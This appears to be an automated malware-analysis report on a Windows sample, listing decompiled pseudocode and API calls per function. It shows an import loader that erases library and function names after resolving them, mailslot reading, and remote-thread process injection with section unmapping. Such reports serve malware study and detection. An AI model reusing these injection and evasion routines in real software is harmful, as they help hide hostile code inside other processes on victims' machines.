Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
